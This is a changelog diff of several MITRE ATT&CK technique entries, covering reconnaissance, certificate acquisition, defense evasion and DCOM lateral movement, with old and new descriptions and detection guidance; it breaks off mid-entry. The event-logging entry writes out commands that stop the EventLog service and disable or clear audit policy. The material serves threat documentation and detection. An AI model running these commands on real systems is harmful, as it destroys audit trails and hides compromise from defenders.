>ed Websites](https://attack.mitre.org/techniques/T1594) or [>ed Websites](https://attack.mitre.org/techniques/T1594) or [
>Social Media](https://attack.mitre.org/techniques/T1593/001)>Social Media](https://attack.mitre.org/techniques/T1593/001)
>).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Busin>).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR
>ess Lookup) Gathering this information may reveal opportunit> Search) Gathering this information may reveal opportunities
>ies for other forms of reconnaissance (ex: [Phishing for Inf> for other forms of reconnaissance (ex: [Phishing for Inform
>ormation](https://attack.mitre.org/techniques/T1598) or [Sea>ation](https://attack.mitre.org/techniques/T1598) or [Search
>rch Open Websites/Domains](https://attack.mitre.org/techniqu> Open Websites/Domains](https://attack.mitre.org/techniques/
>es/T1593)), establishing operational resources (ex: [Develop>T1593)), establishing operational resources (ex: [Develop Ca
> Capabilities](https://attack.mitre.org/techniques/T1587) or>pabilities](https://attack.mitre.org/techniques/T1587) or [O
> [Obtain Capabilities](https://attack.mitre.org/techniques/T>btain Capabilities](https://attack.mitre.org/techniques/T158
>1588)), and/or initial access (ex: [Phishing](https://attack>8)), and/or initial access (ex: [Phishing](https://attack.mi
>.mitre.org/techniques/T1566) or [Hardware Additions](https:/>tre.org/techniques/T1566) or [Hardware Additions](https://at
>/attack.mitre.org/techniques/T1200)).>tack.mitre.org/techniques/T1200)).
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:37:35.863000+00:002021-08-27 15:37:09.025000+00:00
descriptionAdversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
external_references[2]['source_name']DOB Business LookupSEC EDGAR Search
external_references[2]['description']Concert Technologies . (n.d.). Business Lookup - Company Name Search. Retrieved October 20, 2020.U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.
external_references[2]['url']https://www.dobsearch.com/business-lookup/https://www.sec.gov/edgar/search-and-access
x_mitre_version1.01.1

[T1587] Develop Capabilities

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:08:33.511000+00:002021-10-17 16:07:08.768000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Splunk Kovar Certificates 2017', 'description': 'Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.', 'url': 'https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html'}

[T1588.004] Obtain Capabilities: Digital Certificates

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may buy and/or steal SSL/TLS certificates that ct1Adversaries may buy and/or steal SSL/TLS certificates that c
>an be used during targeting. SSL/TLS certificates are design>an be used during targeting. SSL/TLS certificates are design
>ed to instill trust. They include information about the key,>ed to instill trust. They include information about the key,
> information about its owner's identity, and the digital sig> information about its owner's identity, and the digital sig
>nature of an entity that has verified the certificate's cont>nature of an entity that has verified the certificate's cont
>ents are correct. If the signature is valid, and the person >ents are correct. If the signature is valid, and the person 
>examining the certificate trusts the signer, then they know >examining the certificate trusts the signer, then they know 
>they can use that key to communicate with its owner.  Advers>they can use that key to communicate with its owner.  Advers
>aries may purchase or steal SSL/TLS certificates to further >aries may purchase or steal SSL/TLS certificates to further 
>their operations, such as encrypting C2 traffic (ex: [Asymme>their operations, such as encrypting C2 traffic (ex: [Asymme
>tric Cryptography](https://attack.mitre.org/techniques/T1573>tric Cryptography](https://attack.mitre.org/techniques/T1573
>/002) with [Web Protocols](https://attack.mitre.org/techniqu>/002) with [Web Protocols](https://attack.mitre.org/techniqu
>es/T1071/001)) or even enabling [Man-in-the-Middle](https://>es/T1071/001)) or even enabling [Adversary-in-the-Middle](ht
>attack.mitre.org/techniques/T1557) if the certificate is tru>tps://attack.mitre.org/techniques/T1557) if the certificate 
>sted or otherwise added to the root of trust (i.e. [Install >is trusted or otherwise added to the root of trust (i.e. [In
>Root Certificate](https://attack.mitre.org/techniques/T1553/>stall Root Certificate](https://attack.mitre.org/techniques/
>004)). The purchase of digital certificates may be done usin>T1553/004)). The purchase of digital certificates may be don
>g a front organization or using information stolen from a pr>e using a front organization or using information stolen fro
>eviously compromised entity that allows the adversary to val>m a previously compromised entity that allows the adversary 
>idate to a certificate provider as that entity. Adversaries >to validate to a certificate provider as that entity. Advers
>may also steal certificate materials directly from a comprom>aries may also steal certificate materials directly from a c
>ised third-party, including from certificate authorities.(Ci>ompromised third-party, including from certificate authoriti
>tation: DiginotarCompromise) Adversaries may register or hij>es.(Citation: DiginotarCompromise) Adversaries may register 
>ack domains that they will later purchase an SSL/TLS certifi>or hijack domains that they will later purchase an SSL/TLS c
>cate for.  Certificate authorities exist that allow adversar>ertificate for.  Certificate authorities exist that allow ad
>ies to acquire SSL/TLS certificates, such as domain validati>versaries to acquire SSL/TLS certificates, such as domain va
>on certificates, for free.(Citation: Let's Encrypt FAQ)  Aft>lidation certificates, for free.(Citation: Let's Encrypt FAQ
>er obtaining a digital certificate, an adversary may then in>)  After obtaining a digital certificate, an adversary may t
>stall that certificate (see [Install Digital Certificate](ht>hen install that certificate (see [Install Digital Certifica
>tps://attack.mitre.org/techniques/T1608/003)) on infrastruct>te](https://attack.mitre.org/techniques/T1608/003)) on infra
>ure under their control.>structure under their control.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Certificate: Certificate Registration', 'Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:32:49.507000+00:002021-10-16 17:44:09.486000+00:00
descriptionAdversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ) After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ) After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
x_mitre_version1.11.2

[T1587.003] Develop Capabilities: Digital Certificates

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create self-signed SSL/TLS certificates thatt1Adversaries may create self-signed SSL/TLS certificates that
> can be used during targeting. SSL/TLS certificates are desi> can be used during targeting. SSL/TLS certificates are desi
>gned to instill trust. They include information about the ke>gned to instill trust. They include information about the ke
>y, information about its owner's identity, and the digital s>y, information about its owner's identity, and the digital s
>ignature of an entity that has verified the certificate's co>ignature of an entity that has verified the certificate's co
>ntents are correct. If the signature is valid, and the perso>ntents are correct. If the signature is valid, and the perso
>n examining the certificate trusts the signer, then they kno>n examining the certificate trusts the signer, then they kno
>w they can use that key to communicate with its owner. In th>w they can use that key to communicate with its owner. In th
>e case of self-signing, digital certificates will lack the e>e case of self-signing, digital certificates will lack the e
>lement of trust associated with the signature of a third-par>lement of trust associated with the signature of a third-par
>ty certificate authority (CA).  Adversaries may create self->ty certificate authority (CA).  Adversaries may create self-
>signed SSL/TLS certificates that can be used to further thei>signed SSL/TLS certificates that can be used to further thei
>r operations, such as encrypting C2 traffic (ex: [Asymmetric>r operations, such as encrypting C2 traffic (ex: [Asymmetric
> Cryptography](https://attack.mitre.org/techniques/T1573/002> Cryptography](https://attack.mitre.org/techniques/T1573/002
>) with [Web Protocols](https://attack.mitre.org/techniques/T>) with [Web Protocols](https://attack.mitre.org/techniques/T
>1071/001)) or even enabling [Man-in-the-Middle](https://atta>1071/001)) or even enabling [Adversary-in-the-Middle](https:
>ck.mitre.org/techniques/T1557) if added to the root of trust>//attack.mitre.org/techniques/T1557) if added to the root of
> (i.e. [Install Root Certificate](https://attack.mitre.org/t> trust (i.e. [Install Root Certificate](https://attack.mitre
>echniques/T1553/004)).  After creating a digital certificate>.org/techniques/T1553/004)).  After creating a digital certi
>, an adversary may then install that certificate (see [Insta>ficate, an adversary may then install that certificate (see 
>ll Digital Certificate](https://attack.mitre.org/techniques/>[Install Digital Certificate](https://attack.mitre.org/techn
>T1608/003)) on infrastructure under their control.>iques/T1608/003)) on infrastructure under their control.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 02:33:38.589000+00:002021-10-16 17:32:34.604000+00:00
descriptionAdversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
x_mitre_version1.11.2

[T1562.002] Impair Defenses: Disable Windows Event Logging

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may disable Windows event logging to limit data t1Adversaries may disable Windows event logging to limit data 
>that can be leveraged for detections and audits. Windows eve>that can be leveraged for detections and audits. Windows eve
>nt logs record user and system activity such as login attemp>nt logs record user and system activity such as login attemp
>ts, process creation, and much more.(Citation: Windows Log E>ts, process creation, and much more.(Citation: Windows Log E
>vents) This data is used by security tools and analysts to g>vents) This data is used by security tools and analysts to g
>enerate detections.  Adversaries may targeting system-wide l>enerate detections.  The EventLog service maintains event lo
>ogging or just that of a particular application. By disablin>gs from various system components and applications.(Citation
>g Windows event logging, adversaries can operate while leavi>: EventLog_Core_Technologies) By default, the service automa
>ng less evidence of a compromise behind.>tically starts when a system powers on. An audit policy, mai
 >ntained by the Local Security Policy (secpol.msc), defines w
 >hich system events the EventLog service logs. Security audit
 > policy settings can be changed by running secpol.msc, then 
 >navigating to <code>Security Settings\Local Policies\Audit P
 >olicy</code> for basic audit policy settings or <code>Securi
 >ty Settings\Advanced Audit Policy Configuration</code> for a
 >dvanced audit policy settings.(Citation: Audit_Policy_Micros
 >oft)(Citation: Advanced_sec_audit_policy_settings) <code>aud
 >itpol.exe</code> may also be used to set audit policies.(Cit
 >ation: auditpol)  Adversaries may target system-wide logging
 > or just that of a particular application. For example, the 
 >EventLog service may be disabled using the following PowerSh
 >ell line: <code>Stop-Service -Name EventLog</code>.(Citation
 >: Disable_Win_Event_Logging) Additionally, adversaries may u
 >se <code>auditpol</code> and its sub-commands in a command p
 >rompt to disable auditing or clear the audit policy. To enab
 >le or disable a specified setting or audit category, adversa
 >ries may use the <code>/success</code> or <code>/failure</co
 >de> parameters. For example, <code>auditpol /set /category:”
 >Account Logon” /success:disable /failure:disable</code> turn
 >s off auditing for the Account Logon category.(Citation: aud
 >itpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clea
 >r the audit policy, adversaries may run the following lines:
 > <code>auditpol /clear /y</code> or <code>auditpol /remove /
 >allusers</code>.(Citation: T1562.002_redcanaryco)  By disabl
 >ing Windows event logging, adversaries can operate while lea
 >ving less evidence of a compromise behind.

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 22:02:33.870000+00:002021-10-19 13:37:30.534000+00:00
descriptionAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
x_mitre_detectionMonitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) In Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered. Monitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'EventLog_Core_Technologies', 'description': 'Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.', 'url': 'https://www.coretechnologies.com/blog/windows-services/eventlog/'}
external_references{'source_name': 'Audit_Policy_Microsoft', 'description': 'Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy'}
external_references{'source_name': 'Advanced_sec_audit_policy_settings', 'description': 'Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings'}
external_references{'source_name': 'auditpol', 'description': 'Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol'}
external_references{'source_name': 'Disable_Win_Event_Logging', 'description': ' dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.', 'url': 'https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging'}
external_references{'source_name': 'auditpol.exe_STRONTIC', 'description': 'STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.', 'url': 'https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html'}
external_references{'source_name': 'T1562.002_redcanaryco', 'description': 'redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.', 'url': 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md'}
external_references{'source_name': 'def_ev_win_event_logging', 'description': 'Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.', 'url': 'https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/'}
external_references{'source_name': 'evt_log_tampering', 'description': 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.', 'url': 'https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c'}
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesScript: Script Execution
x_mitre_data_sourcesWindows Registry: Windows Registry Key Creation
x_mitre_data_sourcesApplication Log: Application Log Content

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may disable security tools to avoid possible dett1Adversaries may modify and/or disable security tools to avoi
>ection of their tools and activities. This can take the form>d possible detection of their malware/tools and activities. 
> of killing security software or event logging processes, de>This may take the many forms, such as killing security softw
>leting Registry keys so that tools do not start at run time,>are processes or services, modifying / deleting Registry key
> or other methods to interfere with security tools scanning >s or configuration files so that tools do not operate proper
>or reporting information.>ly, or other methods to interfere with security tools scanni
 >ng or reporting information.  Adversaries may also tamper wi
 >th artifacts deployed and utilized by security tools. Securi
 >ty tools may make dynamic changes to system components in or
 >der to maintain visibility into specific events. For example
 >, security products may load their own modules and/or modify
 > those loaded by processes to facilitate data collection. Si
 >milar to [Indicator Blocking](https://attack.mitre.org/techn
 >iques/T1562/006), adversaries may unhook or otherwise modify
 > these features added by tools (especially those that exist 
 >in userland or are otherwise potentially accessible to adver
 >saries) to avoid detection.(Citation: OutFlank System Calls)
 >(Citation: MDSec System Calls)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 13:41:17.746000+00:002021-10-18 21:27:48.159000+00:00
descriptionAdversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
x_mitre_detectionMonitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity. Lack of expected log events may be suspicious.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'OutFlank System Calls', 'description': 'de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.', 'url': 'https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/'}
external_references{'source_name': 'MDSec System Calls', 'description': 'MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.', 'url': 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/'}
x_mitre_contributorsGordon Long, Box, Inc., @ethicalhax

[T1021.003] Remote Services: Distributed Component Object Model

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use [Valid Accounts](https://attack.mitre.ort1Adversaries may use [Valid Accounts](https://attack.mitre.or
>g/techniques/T1078) to interact with remote machines by taki>g/techniques/T1078) to interact with remote machines by taki
>ng advantage of Distributed Component Object Model (DCOM). T>ng advantage of Distributed Component Object Model (DCOM). T
>he adversary may then perform actions as the logged-on user.>he adversary may then perform actions as the logged-on user.
>  The Windows Component Object Model (COM) is a component of>  The Windows Component Object Model (COM) is a component of
> the native Windows application programming interface (API) > the native Windows application programming interface (API) 
>that enables interaction between software objects, or execut>that enables interaction between software objects, or execut
>able code that implements one or more interfaces. Through CO>able code that implements one or more interfaces. Through CO
>M, a client object can call methods of server objects, which>M, a client object can call methods of server objects, which
> are typically Dynamic Link Libraries (DLL) or executables (> are typically Dynamic Link Libraries (DLL) or executables (
>EXE). Distributed COM (DCOM) is transparent middleware that >EXE). Distributed COM (DCOM) is transparent middleware that 
>extends the functionality of COM beyond a local computer usi>extends the functionality of COM beyond a local computer usi
>ng remote procedure call (RPC) technology.(Citation: Fireeye>ng remote procedure call (RPC) technology.(Citation: Fireeye
> Hunting COM June 2019)(Citation: Microsoft COM)  Permission> Hunting COM June 2019)(Citation: Microsoft COM)  Permission
>s to interact with local and remote server COM objects are s>s to interact with local and remote server COM objects are s
>pecified by access control lists (ACL) in the Registry.(Cita>pecified by access control lists (ACL) in the Registry.(Cita
>tion: Microsoft Process Wide Com Keys) By default, only Admi>tion: Microsoft Process Wide Com Keys) By default, only Admi
>nistrators may remotely activate and launch COM objects thro>nistrators may remotely activate and launch COM objects thro
>ugh DCOM.(Citation: Microsoft COM ACL)  Through DCOM, advers>ugh DCOM.(Citation: Microsoft COM ACL)  Through DCOM, advers
>aries operating in the context of an appropriately privilege>aries operating in the context of an appropriately privilege
>d user can remotely obtain arbitrary and even direct shellco>d user can remotely obtain arbitrary and even direct shellco
>de execution through Office applications(Citation: Enigma Ou>de execution through Office applications(Citation: Enigma Ou
>tlook DCOM Lateral Movement Nov 2017) as well as other Windo>tlook DCOM Lateral Movement Nov 2017) as well as other Windo
>ws objects that contain insecure methods.(Citation: Enigma M>ws objects that contain insecure methods.(Citation: Enigma M
>MC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Ja>MC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Ja
>n 2017) DCOM can also execute macros in existing documents(C>n 2017) DCOM can also execute macros in existing documents(C
>itation: Enigma Excel DCOM Sept 2017) and may also invoke Dy>itation: Enigma Excel DCOM Sept 2017) and may also invoke [D
>namic Data Exchange (DDE) execution directly through a COM c>ynamic Data Exchange](https://attack.mitre.org/techniques/T1
>reated instance of a Microsoft Office application(Citation: >559/002) (DDE) execution directly through a COM created inst
>Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing t>ance of a Microsoft Office application(Citation: Cyberreason
>he need for a malicious document.> DCOM DDE Lateral Movement Nov 2017), bypassing the need for
 > a malicious document. DCOM can be used as a method of remot
 >ely interacting with [Windows Management Instrumentation](ht
 >tps://attack.mitre.org/techniques/T1047). (Citation: MSDN WM
 >I)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 20:21:03.684000+00:002021-06-23 18:58:32.752000+00:00
descriptionAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM) Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL) Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook 